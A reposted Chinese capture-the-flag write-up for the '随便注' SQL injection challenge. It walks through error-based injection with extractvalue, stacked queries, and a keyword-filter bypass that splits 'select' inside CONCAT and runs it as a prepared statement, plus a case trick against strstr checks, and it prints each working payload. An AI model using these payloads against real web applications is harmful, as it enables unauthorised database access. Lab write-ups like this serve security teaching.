内容简介:这道题的题目就是随便注,说是取自某次真实渗透环境,确定了这道题是考察注入,经测试发现为单引号包裹的字符型注入,但是存在存在过滤,过滤的sql关键字如下
这道题的题目就是随便注,说是取自某次真实渗透环境,确定了这道题是考察注入,经测试发现为单引号包裹的字符型注入,但是存在存在过滤,过滤的 sql 关键字如下
preg_match("/select|update|delete|drop|insert|where|\./i", $inject);
这里过滤了select关键字,/i表示对大小写进行检查,所以大小写绕过无效,所以这里需要想别的办法,首先通过报错注入可以获取数据库的相关信息
通过报错注入获取当前数据库类型与版本:
http://117.78.39.172:32689/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+
.27-MariaDB-0ubuntu0.16.04.1
获取当前数据库名:
supersqli
这里因为严格过滤了select关键字,导致不能继续注入,但是之后发现可以执行多语句,通过堆叠查询成功获取当前数据库(supersqli)下的表名
http://117.78.39.172:32689/?inject=-1%27;use%20supersqli;show%20tables;--+
于是有了一个清晰的思路,可以通过执行多语句,将要执行的sql语句进行拼接,这样就可以将过滤的 sql关键字拆分绕过检测,通过动态执行sql语句发现1919810931114514表当中存在flag字段,payload如下
';use information_schema;set @sql=concat('s','elect column_name from columns wher','e table_name="1919810931114514"');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+
之后就可以获取flag列的内容了
';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+
(需要注意的一点是这一点使用了strstr对set和prepare关键字进行了检查,但是strstr检查不对大小写进行检查,所以这里可以通过大小写绕过,set和prepare关键字只要有一个是大写就可以绕过)
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
